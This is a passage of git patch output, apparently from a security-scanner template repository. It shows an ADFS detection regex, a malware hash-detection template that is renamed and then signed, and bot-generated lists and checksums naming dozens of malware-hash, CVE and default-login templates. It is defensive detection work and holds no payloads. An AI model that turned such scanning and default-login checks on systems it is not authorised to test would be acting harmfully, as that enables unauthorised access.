4a0a0047304502204f8813a017c08a91775dac6578074e41f7d711f60576720edc25fe3416118bdc022100de79f17b542f4b677f23ad94a47707d5a6abf171b9bc88ff404f74e9eba69d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml index d8b07d134a..e8b051662b 100644 --- a/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml +++ b/http/default-logins/mantisbt/mantisbt-anonymous-login.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502201cd4fb8e5b9edfdabb9e51e1946d869a78dd98154c64ba176d3ea231e5ad3ae7022100dd971809685c9e08b8e5fe39100d2d2da8f722f1ab83022653d06091daae5ca6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 6bdf2aa172b3a31e8682e872896acd8b3a05ab42 Mon Sep 17 00:00:00 2001 From: Anton Strilez Date: Fri, 21 Jun 2024 10:28:43 +0200 Subject: [PATCH 0488/1841] add domain extraction --- http/technologies/adfs-detect.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/http/technologies/adfs-detect.yaml b/http/technologies/adfs-detect.yaml index 257b4245e4..59024c040c 100644 --- a/http/technologies/adfs-detect.yaml +++ b/http/technologies/adfs-detect.yaml @@ -2,7 +2,7 @@ id: adfs-detect info: name: ADFS Detect - author: Adam Crosser + author: Adam Crosser,Mys7ic severity: info description: Detects ADFS with forms-based authentication enabled. metadata: @@ -20,5 +20,13 @@ http: part: body words: - '/adfs/portal/css/style.css' + + extractors: + - type: regex + part: body + name: domain + group: 1 + regex: + - 'var\s+userNameValue\s*=\s*''([^\\]*)\\' # digest: 4a0a0047304502200fd3109b341765721cc300a6fc04830ccc8d78a68883b3b08ed48841c3ba1ad3022100a01920ae98b24f8b98962e684308e29f8f3f285540b18504211ad783d94990e4:922c64590222798bb761d5b6d8e72950 From 98562ac5c18c9cbb486cfc939fa440318551bd4c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 21 Jun 2024 14:36:32 +0530 Subject: [PATCH 0489/1841] trail space fix --- http/technologies/adfs-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/adfs-detect.yaml b/http/technologies/adfs-detect.yaml index 59024c040c..1f95fb82e6 100644 --- a/http/technologies/adfs-detect.yaml +++ b/http/technologies/adfs-detect.yaml @@ -20,7 +20,7 @@ http: part: body words: - '/adfs/portal/css/style.css' - + extractors: - type: regex part: body From 01c519f6dff5769844084efed35ae805a559c86c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 21 Jun 2024 09:16:05 +0000 Subject: [PATCH 0490/1841] Auto Generated New Template Addition List [Fri Jun 21 09:16:05 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 32ec7b9600..f45d5982c1 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/cves/2023/CVE-2023-6786.yaml http/cves/2024/CVE-2024-0250.yaml http/cves/2024/CVE-2024-0939.yaml http/cves/2024/CVE-2024-1728.yaml +http/cves/2024/CVE-2024-21650.yaml http/cves/2024/CVE-2024-23692.yaml http/cves/2024/CVE-2024-24112.yaml http/cves/2024/CVE-2024-24565.yaml From fd9d8d14d3905c2fdbf846b2f4cac5bad9f01331 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 21 Jun 2024 09:16:09 +0000 Subject: [PATCH 0491/1841] Auto Generated Templates Checksum [Fri Jun 21 09:16:09 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 047bc6571c..eac36f9e59 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3293,6 +3293,7 @@ http/cves/2024/CVE-2024-1728.yaml:53f4b2e0ca6437434e903db273382fb8d009fd46 http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2 http/cves/2024/CVE-2024-21644.yaml:48021ee39de24e3ea1ef7e900a5a28ebed70f411 http/cves/2024/CVE-2024-21645.yaml:0b8856904f2d109744123490861e51f34afcff6b +http/cves/2024/CVE-2024-21650.yaml:ea4dc2ea29324d3bb76d9a6384f163a0965e5a7d http/cves/2024/CVE-2024-21683.yaml:043bd906b34a9c1e389305c6bf54e415a83ce24b http/cves/2024/CVE-2024-21887.yaml:909d11e3661377887b920f5c43436e2d685c34ca http/cves/2024/CVE-2024-21893.yaml:a791d8f44ac8b7e7aee47af58c8e8808e625982b @@ -3355,7 +3356,7 @@ http/cves/2024/CVE-2024-34470.yaml:9e15fe4d83b7f511f9e363252311ce0fca2208d8 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-34982.yaml:68453463b4c080e16f4b23e4bcf22565276f0e20 http/cves/2024/CVE-2024-3552.yaml:0994d94f6f8b7ea5f3774e6b4fbc542a57369f6e -http/cves/2024/CVE-2024-36412.yaml:4f4ee1ed6a60a21f8cdb2f8ba790b77f65e49f99 +http/cves/2024/CVE-2024-36412.yaml:3dab338da4cd060aacc90a2c21159bf56c95bdff http/cves/2024/CVE-2024-36837.yaml:65450880230a57a47c4dbf8b268af022ab009189 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c @@ -3465,7 +3466,7 @@ http/default-logins/leostream/leostream-default-login.yaml:b478948b507e476bd490b http/default-logins/lucee/lucee-default-login.yaml:1f77fa884b48e3e147c00290ceedb09037d1ba49 http/default-logins/lutron/lutron-default-login.yaml:03cca82eae76164ef0f6576423f6a1499eb7a1a3 http/default-logins/magnolia-default-login.yaml:f1d27055c0c45da07e214e7cb2b677fe2808c919 -http/default-logins/mantisbt/mantisbt-anonymous-login.yaml:707fd8555ea2f6055073bd189c176f8b9ac1f0ac +http/default-logins/mantisbt/mantisbt-anonymous-login.yaml:d4bb3fd58c2ab9126e15f269838104570a33625a http/default-logins/mantisbt/mantisbt-default-credential.yaml:30f4e0ea9fb36172667235072e61ef734891ac9a http/default-logins/minio/minio-default-login.yaml:f832e9adbba186536407af73fbba5e55b73cf0d8 http/default-logins/mobotix/mobotix-default-login.yaml:e1ae410268e501412f31b614dc1f1194bb22f318 @@ -8691,7 +8692,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:552511bdf125df22f492d97128e68a0faadcf17c +templates-checksum.txt:a18ee3f91c192b3df2cef95abc7f28df6b951541 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9a1fee1e238e37434c9f72de93ca5f5ad1ac273b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 21 Jun 2024 09:16:51 +0000 Subject: [PATCH 0492/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b63af74017..3be23b3db6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/cves/2024/CVE-2024-0250.yaml' - 'http/cves/2024/CVE-2024-0939.yaml' - 'http/cves/2024/CVE-2024-1728.yaml' + - 'http/cves/2024/CVE-2024-21650.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' - 'http/cves/2024/CVE-2024-24112.yaml' - 'http/cves/2024/CVE-2024-24565.yaml' From e70923eae95ab4c243b39f7b5c70d9e11fc50fc6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 21 Jun 2024 09:18:00 +0000 Subject: [PATCH 0493/1841] Auto Template Signing [Fri Jun 21 09:18:00 UTC 2024] :robot: --- http/cves/2024/CVE-2024-21650.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-21650.yaml b/http/cves/2024/CVE-2024-21650.yaml index 9e30861965..72b9ce22fd 100644 --- a/http/cves/2024/CVE-2024-21650.yaml +++ b/http/cves/2024/CVE-2024-21650.yaml @@ -82,3 +82,4 @@ http: regex: - data\-xwiki\-form\-token="([a-zA-Z0-9]+)"> internal: true +# digest: 4b0a0048304602210087b0acecc99f2247c44e6daa25deca7a92cfe251dca84e6bb0e4c5fc404eda57022100a3ee075f6e5d98e88922b832c04fcdc0f10b235ba6febc468faf1ae2f50ed5d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 03babcd6d6b30820ace1bdb225c77e600c1674c0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 21 Jun 2024 15:20:01 +0530 Subject: [PATCH 0494/1841] Update and rename file/malware/upstyle-malware-hash.yaml to file/malware/hash/upstyle-malware-hash.yaml --- file/malware/{ => hash}/upstyle-malware-hash.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename file/malware/{ => hash}/upstyle-malware-hash.yaml (87%) diff --git a/file/malware/upstyle-malware-hash.yaml b/file/malware/hash/upstyle-malware-hash.yaml similarity index 87% rename from file/malware/upstyle-malware-hash.yaml rename to file/malware/hash/upstyle-malware-hash.yaml index dddcd0706d..cd4fb8f390 100644 --- a/file/malware/upstyle-malware-hash.yaml +++ b/file/malware/hash/upstyle-malware-hash.yaml @@ -1,12 +1,12 @@ id: upstyle-malware-hash + info: name: Upstyle Malware Hash - Detect author: Kazgangap severity: info - reference: - - https://unit42.paloaltonetworks.com/cve-2024-3400/ + reference: - https://github.com/volexity/threat-intel/blob/main/2024/2024-04-12%20Palo%20Alto%20Networks%20GlobalProtect/indicators/rules.yar - tags: malware,cve2024 + tags: malware,upstyle file: - extensions: From 0974a4339550f894ad7ff04dc6e0d289b078469c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 21 Jun 2024 15:22:20 +0530 Subject: [PATCH 0495/1841] trail lint --- file/malware/hash/upstyle-malware-hash.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/malware/hash/upstyle-malware-hash.yaml b/file/malware/hash/upstyle-malware-hash.yaml index cd4fb8f390..c84a803fd1 100644 --- a/file/malware/hash/upstyle-malware-hash.yaml +++ b/file/malware/hash/upstyle-malware-hash.yaml @@ -4,7 +4,7 @@ info: name: Upstyle Malware Hash - Detect author: Kazgangap severity: info - reference: + reference: - https://github.com/volexity/threat-intel/blob/main/2024/2024-04-12%20Palo%20Alto%20Networks%20GlobalProtect/indicators/rules.yar tags: malware,upstyle From d73c428ecce2935bbe32e4cd1d54f54c6baf7245 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 21 Jun 2024 09:55:30 +0000 Subject: [PATCH 0496/1841] Auto Generated New Template Addition List [Fri Jun 21 09:55:30 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f45d5982c1..f8e77f209c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ cloud/aws/sns/sns-public-subscribe-access.yaml dast/vulnerabilities/sqli/time-based-sqli.yaml +file/malware/hash/upstyle-malware-hash.yaml http/cves/2021/CVE-2021-38146.yaml http/cves/2021/CVE-2021-38147.yaml http/cves/2021/CVE-2021-43831.yaml From 1e5745f37dcf21231849d0fcdc4a6fee416732bb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 21 Jun 2024 09:55:37 +0000 Subject: [PATCH 0497/1841] Auto Generated Templates Checksum [Fri Jun 21 09:55:37 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index eac36f9e59..3a30aff285 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -486,6 +486,7 @@ file/malware/gozi-malware.yaml:3367af9619300eaceddcd92e7c771767a60bc411 file/malware/gpgqwerty-malware.yaml:fa5ad4427cbd567433ead29ae1d159ca427d56ce file/malware/greame-malware.yaml:02217bf5927c58c56dde1043a656cc8b9f05f4a5 file/malware/grozlex-malware.yaml:bd6ee9393817d362ba0729a989f145547a38df15 +file/malware/hash/upstyle-malware-hash.yaml:1091295f25c5fff4167dcf33ce6ce7d9453e40f6 file/malware/hawkeye-malware.yaml:7cfd7dcaa71a7e08f27724e24f49c8d9c8e60315 file/malware/hydracrypt-malware.yaml:8924311d2a7dff9d3a6b8f5d3fd0c294604f48a9 file/malware/imminent-malware.yaml:6443426fde4dc82ce34a2239251726cc95e8fa44 @@ -3293,7 +3294,7 @@ http/cves/2024/CVE-2024-1728.yaml:53f4b2e0ca6437434e903db273382fb8d009fd46 http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2 http/cves/2024/CVE-2024-21644.yaml:48021ee39de24e3ea1ef7e900a5a28ebed70f411 http/cves/2024/CVE-2024-21645.yaml:0b8856904f2d109744123490861e51f34afcff6b -http/cves/2024/CVE-2024-21650.yaml:ea4dc2ea29324d3bb76d9a6384f163a0965e5a7d +http/cves/2024/CVE-2024-21650.yaml:4f0a59b8d224262e95327dd4ed30d02741831108 http/cves/2024/CVE-2024-21683.yaml:043bd906b34a9c1e389305c6bf54e415a83ce24b http/cves/2024/CVE-2024-21887.yaml:909d11e3661377887b920f5c43436e2d685c34ca http/cves/2024/CVE-2024-21893.yaml:a791d8f44ac8b7e7aee47af58c8e8808e625982b @@ -8692,7 +8693,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a18ee3f91c192b3df2cef95abc7f28df6b951541 +templates-checksum.txt:2e1f712781084dc3f1d2dd2c3d0c80373e2e27f9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a10acd856c6d85ac32edd3f0eed24f234f37aa69 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 21 Jun 2024 09:56:39 +0000 Subject: [PATCH 0498/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 3be23b3db6..a866fe189b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'cloud/aws/sns/sns-public-subscribe-access.yaml' - 'dast/vulnerabilities/sqli/time-based-sqli.yaml' + - 'file/malware/hash/upstyle-malware-hash.yaml' - 'http/cves/2021/CVE-2021-38146.yaml' - 'http/cves/2021/CVE-2021-38147.yaml' - 'http/cves/2021/CVE-2021-43831.yaml' From 01914f9c8fad0e99a965842b6e4c94987a79e0dc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 21 Jun 2024 09:57:18 +0000 Subject: [PATCH 0499/1841] Auto Template Signing [Fri Jun 21 09:57:18 UTC 2024] :robot: --- file/malware/hash/upstyle-malware-hash.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/file/malware/hash/upstyle-malware-hash.yaml b/file/malware/hash/upstyle-malware-hash.yaml index c84a803fd1..2a1155affb 100644 --- a/file/malware/hash/upstyle-malware-hash.yaml +++ b/file/malware/hash/upstyle-malware-hash.yaml @@ -19,3 +19,4 @@ file: - "sha256(raw) == '0d59d7bddac6c22230187ef6cf7fa22bca93759edc6f9127c41dc28a2cea19d8'" - "sha256(raw) == '4dd4bd027f060f325bf6a90d01bfcf4e7751a3775ad0246beacc6eb2bad5ec6f'" condition: or +# digest: 4b0a00483046022100b6cc6e0f799d614a9e954df8873a2ca213babf635e58744722e7c622bbf1b8aa022100acb59a4fd79b7c0332adff6600f0c308b607bf6f8e4678aad2fde28f68d44e7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d416126bf111f50d0b4cdc331616ec7d8e73ba83 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Fri, 21 Jun 2024 10:02:56 +0000 Subject: [PATCH 0500/1841] Auto Generated New Template Addition List [Fri Jun 21 10:02:56 UTC 2024] :robot: --- .new-additions | 65 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 65 insertions(+) diff --git a/.new-additions b/.new-additions index f8e77f209c..b4f5526224 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,71 @@ cloud/aws/sns/sns-public-subscribe-access.yaml dast/vulnerabilities/sqli/time-based-sqli.yaml +file/malware/hash/anthem-deeppanda-malware-hash.yaml +file/malware/hash/applejeus-malware-hash.yaml +file/malware/hash/avburner-malware-hash.yaml +file/malware/hash/backwash-malware-hash.yaml +file/malware/hash/blackenergy-driver-amdide-hash.yaml +file/malware/hash/blackenergy-driver-malware-hash.yaml +file/malware/hash/blackenergy-killdisk-malware-hash.yaml +file/malware/hash/blackenergy-ssh-malware-hash.yaml +file/malware/hash/blackenergy-vbs-malware-hash.yaml +file/malware/hash/bluelight-malware-hash.yaml +file/malware/hash/bluetermite-emdivi-malware-hash.yaml +file/malware/hash/bluetermite-emdivi-sfx-hash.yaml +file/malware/hash/charmingcypress-malware-hash.yaml +file/malware/hash/cheshirecat-malware-hash.yaml +file/malware/hash/cloudduke-malware-hash.yaml +file/malware/hash/codoso-gh0st-malware.yaml +file/malware/hash/codoso-malware-hash.yaml +file/malware/hash/codoso-pgv-malware-hash.yaml +file/malware/hash/codoso-plugx-malware-hash.yaml +file/malware/hash/disgomoji-malware-hash.yaml +file/malware/hash/dubnium-malware-hash.yaml +file/malware/hash/dubnium-sshopenssl-malware-hash.yaml +file/malware/hash/emissary-malware-hash.yaml +file/malware/hash/evilbamboo-malware-hash.yaml +file/malware/hash/fakem-malware-hash.yaml +file/malware/hash/flipflop-malware-hash.yaml +file/malware/hash/furtim-malware-hash.yaml +file/malware/hash/gimmick-malware-hash.yaml +file/malware/hash/godzilla-webshell-hash.yaml +file/malware/hash/greenbug-malware-hash.yaml +file/malware/hash/ico-malware-hash.yaml +file/malware/hash/industroyer-malware-hash.yaml +file/malware/hash/ironPanda-htran-malware-hash.yaml +file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml +file/malware/hash/ironpanda-malware-hash.yaml +file/malware/hash/locky-ransomware-hash.yaml +file/malware/hash/minidionis-readerview-malware-hash.yaml +file/malware/hash/minidionis-vbs-malware-hash.yaml +file/malware/hash/naikon-apt-malware-hash.yaml +file/malware/hash/neuron2-malware-hash.yaml +file/malware/hash/oilrig-malware-hash.yaml +file/malware/hash/passcv-ntscan-malware-hash.yaml +file/malware/hash/passcv-sabre-malware-hash.yaml +file/malware/hash/passcv-signingcert-malware-hash.yaml +file/malware/hash/petya-ransomware-hash.yaml +file/malware/hash/poseidongroup-maldoc-malware-hash.yaml +file/malware/hash/poseidongroup-malware-hash.yaml +file/malware/hash/powerstar-malware-hash.yaml +file/malware/hash/purplewave-malware-hash.yaml +file/malware/hash/red-leaves-malware-hash.yaml +file/malware/hash/regeorg-webshell-hash.yaml +file/malware/hash/revil-ransomware-hash.yaml +file/malware/hash/rokrat-malware-hash.yaml +file/malware/hash/sauron-malware-hash.yaml +file/malware/hash/seaduke-malware-hash.yaml +file/malware/hash/sfx1-malware-hash.yaml +file/malware/hash/sfxrar-acrotray-malware-hash.yaml +file/malware/hash/sharpext-malware-hash.yaml +file/malware/hash/sofacy-Winexe-malware-hash.yaml +file/malware/hash/sofacy-bundestag-malware-hash.yaml +file/malware/hash/sofacy-fybis-malware-hash.yaml +file/malware/hash/tidepool-malware-hash.yaml +file/malware/hash/turla-malware-hash.yaml +file/malware/hash/unit78020-malware-hash.yaml file/malware/hash/upstyle-malware-hash.yaml +file/malware/hash/wildneutron-malware-hash.yaml http/cves/2021/CVE-2021-38146.yaml http/cves/2021/CVE-2021-38147.yaml http/cves/2021/CVE-2021-43831.yaml From f07d0b5d5dca5f53582f8555ccb853bf759678c1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 21 Jun 2024 10:03:00 +0000 Subject: [PATCH 0501/1841] Auto Generated Templates Checksum [Fri Jun 21 10:03:00 UTC 2024] :robot: --- templates-checksum.txt | 69 ++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 67 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3a30aff285..11ea77c28b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -486,7 +486,72 @@ file/malware/gozi-malware.yaml:3367af9619300eaceddcd92e7c771767a60bc411 file/malware/gpgqwerty-malware.yaml:fa5ad4427cbd567433ead29ae1d159ca427d56ce file/malware/greame-malware.yaml:02217bf5927c58c56dde1043a656cc8b9f05f4a5 file/malware/grozlex-malware.yaml:bd6ee9393817d362ba0729a989f145547a38df15 -file/malware/hash/upstyle-malware-hash.yaml:1091295f25c5fff4167dcf33ce6ce7d9453e40f6 +file/malware/hash/anthem-deeppanda-malware-hash.yaml:8a8de4db2fc1a2047ff1280950eab7d455a21ca8 +file/malware/hash/applejeus-malware-hash.yaml:5b9a1fcc0655b7c738f3790103ae803fb7a2165b +file/malware/hash/avburner-malware-hash.yaml:175ef4e78f38e0472e4b9dc1614e709b237ea54c +file/malware/hash/backwash-malware-hash.yaml:254320dde94fc06dc697ffa3387fd8ba4a1a7fd5 +file/malware/hash/blackenergy-driver-amdide-hash.yaml:401d355fdd09d24a0d166bef93ea4abc7572a248 +file/malware/hash/blackenergy-driver-malware-hash.yaml:5405d7feb85f0e7758a47a369ea6e9b93d25926d +file/malware/hash/blackenergy-killdisk-malware-hash.yaml:0aebbe8b99d250c2dfe875446f5de5c5b9c0fbc8 +file/malware/hash/blackenergy-ssh-malware-hash.yaml:17eb753cc46f8f4963d4cf9d4185ad969ea3b594 +file/malware/hash/blackenergy-vbs-malware-hash.yaml:7bc2ad119c25f81cbdf2229728aba0829fcb7c08 +file/malware/hash/bluelight-malware-hash.yaml:0ec2971becec728ce5886bcd07ee195f3e74a8c0 +file/malware/hash/bluetermite-emdivi-malware-hash.yaml:44912890eb85f2e978eb9b176a461c9d8943840f +file/malware/hash/bluetermite-emdivi-sfx-hash.yaml:711c5cc37c6584d27cf3ed3820c80ce5bc75e7ff +file/malware/hash/charmingcypress-malware-hash.yaml:c7d792ba6052364803bb97e309b084a45b2ffa43 +file/malware/hash/cheshirecat-malware-hash.yaml:9275ccf7de2096e1280be461f2102590b20d32ad +file/malware/hash/cloudduke-malware-hash.yaml:fe649c47667c26c3a2f9b9b80e3de39a0c4a4255 +file/malware/hash/codoso-gh0st-malware.yaml:f2de52eb44edf0f82756a97b8b9a909e23fcf79f +file/malware/hash/codoso-malware-hash.yaml:ec103ba162c3b1d57abc41d5fd030b9e07ae5026 +file/malware/hash/codoso-pgv-malware-hash.yaml:88473f2d1fdb08f3fc29a27ece4736cd7f984521 +file/malware/hash/codoso-plugx-malware-hash.yaml:a3361b28ced4ba3f717c5ed171bff135020fba15 +file/malware/hash/disgomoji-malware-hash.yaml:6ed3c40bf2b2cfd3bc0b25a0ca71fe8f34d27846 +file/malware/hash/dubnium-malware-hash.yaml:66bc490a584a7ed23a8912e7ecccbb5f092e605e +file/malware/hash/dubnium-sshopenssl-malware-hash.yaml:9f28c0c59819459b112aa736a5aca9a57d03d5e4 +file/malware/hash/emissary-malware-hash.yaml:8ef72ae8ffd57f2d7d92955877a722a37bced76d +file/malware/hash/evilbamboo-malware-hash.yaml:dc593c3ee3f8d84cec7dde9e1f392c3d853c18b3 +file/malware/hash/fakem-malware-hash.yaml:be36e4b7d31d368ff960c1d91d1307ef463cf66c +file/malware/hash/flipflop-malware-hash.yaml:5f027bbd9f9756051811e99826b3b85c8a3f97bd +file/malware/hash/furtim-malware-hash.yaml:f6ce5c5b1e9f27bff627d0bbce722fb9fc6fab13 +file/malware/hash/gimmick-malware-hash.yaml:452b9f313d567b3341ef2515571c1990164f2bc0 +file/malware/hash/godzilla-webshell-hash.yaml:06decaf5c9e14daad2bf34a351fda9b82bc99221 +file/malware/hash/greenbug-malware-hash.yaml:e51561e86727a09014fc0dddd80ece02d1a779e7 +file/malware/hash/ico-malware-hash.yaml:2e83beba9d1487b6c7ec44c9ed3be7ea477035a0 +file/malware/hash/industroyer-malware-hash.yaml:bb0715fe709b1648505030b4cfa4f35001a572af +file/malware/hash/ironPanda-htran-malware-hash.yaml:235d100100922afc0c7c8db239df8406669a32cf +file/malware/hash/ironpanda-dnstunclient-malware-hash.yaml:5f8a26f3fea7ff59fa859a6bbe12adf63a0be721 +file/malware/hash/ironpanda-malware-hash.yaml:95897bb3a313996576ff77fb622a15e4a8bdb462 +file/malware/hash/locky-ransomware-hash.yaml:8ca7178dc2f0d87ecf08260f6510616197587873 +file/malware/hash/minidionis-readerview-malware-hash.yaml:7ed9c5456e0b0badb5748a2291a099a0e413dae8 +file/malware/hash/minidionis-vbs-malware-hash.yaml:7f0e0c660e5ba57335bb3957c5378cc75ad60afc +file/malware/hash/naikon-apt-malware-hash.yaml:c83b12f51a84e98ae05527abf5faa9d74748470e +file/malware/hash/neuron2-malware-hash.yaml:f3ac42a8306efa63bf4c562ca45d5985cfd2a904 +file/malware/hash/oilrig-malware-hash.yaml:c9059433e8c18cc962df5c9129d2091722459d99 +file/malware/hash/passcv-ntscan-malware-hash.yaml:7d1efb6638a88c98ef56955209a1ed5dab80ea7f +file/malware/hash/passcv-sabre-malware-hash.yaml:415e1ea451092ca91a6d701e096a083d595ce023 +file/malware/hash/passcv-signingcert-malware-hash.yaml:65655778290d72bda1663da6bc22b799ee12b8b7 +file/malware/hash/petya-ransomware-hash.yaml:d85c9e4ad789796be063225a74ed57f53023b8db +file/malware/hash/poseidongroup-maldoc-malware-hash.yaml:51e18405751f2f30ce0e4d29a53e0d50300533c2 +file/malware/hash/poseidongroup-malware-hash.yaml:05d6453e83b68620f89a802522d31336a5db9619 +file/malware/hash/powerstar-malware-hash.yaml:6df4fc3a7252f86faa62304594e91ec26374527c +file/malware/hash/purplewave-malware-hash.yaml:f012c95a15ddadc82face1e76d80b4156ed24917 +file/malware/hash/red-leaves-malware-hash.yaml:0ac57673e3b43055ea81729ce3330ff84341d52c +file/malware/hash/regeorg-webshell-hash.yaml:bb87337926146954751a514d3e15d55737c5c43e +file/malware/hash/revil-ransomware-hash.yaml:60b6abd75a69b29f6be4e302c0a3539acabbf238 +file/malware/hash/rokrat-malware-hash.yaml:9dd844b397e5c6da9719cad8861b692a86b81e96 +file/malware/hash/sauron-malware-hash.yaml:7a810169710231b50ffdec2253be5808fae98893 +file/malware/hash/seaduke-malware-hash.yaml:3c20079a8c1937ad5cc6e3181a31066883dd61a2 +file/malware/hash/sfx1-malware-hash.yaml:162e36001251ea57c3331109b920658317aaa4b3 +file/malware/hash/sfxrar-acrotray-malware-hash.yaml:b9a1783463ee560a07c8057cf2bd583f9b04094d +file/malware/hash/sharpext-malware-hash.yaml:2200fa9665608af11a7cd6ee39be33a357f13e6e +file/malware/hash/sofacy-Winexe-malware-hash.yaml:b2be16a086126573ad2d1eace5a4084a3bb89bed +file/malware/hash/sofacy-bundestag-malware-hash.yaml:8adb1c70db65b3436e462688875da031c40d895d +file/malware/hash/sofacy-fybis-malware-hash.yaml:8ff8771cbec7bb32396176be4341d999470653a3 +file/malware/hash/tidepool-malware-hash.yaml:370550b5885530298c410620d9aaaabe24e16cd0 +file/malware/hash/turla-malware-hash.yaml:da71c6ae0ed12eb8bc2510604b579b3e389c166e +file/malware/hash/unit78020-malware-hash.yaml:4a4a09689eda9a732baa9697998d15b076bf05ac +file/malware/hash/upstyle-malware-hash.yaml:97dd29d1157acde770bd48f12fcf721fc1f828f6 +file/malware/hash/wildneutron-malware-hash.yaml:0ec84ed19d87c0b6859492f557a4cf9eea0e0b1a file/malware/hawkeye-malware.yaml:7cfd7dcaa71a7e08f27724e24f49c8d9c8e60315 file/malware/hydracrypt-malware.yaml:8924311d2a7dff9d3a6b8f5d3fd0c294604f48a9 file/malware/imminent-malware.yaml:6443426fde4dc82ce34a2239251726cc95e8fa44 @@ -8693,7 +8758,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2e1f712781084dc3f1d2dd2c3d0c80373e2e27f9 +templates-checksum.txt:73fa7679b346f135e75b7be73ae6e8d63f396ba8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 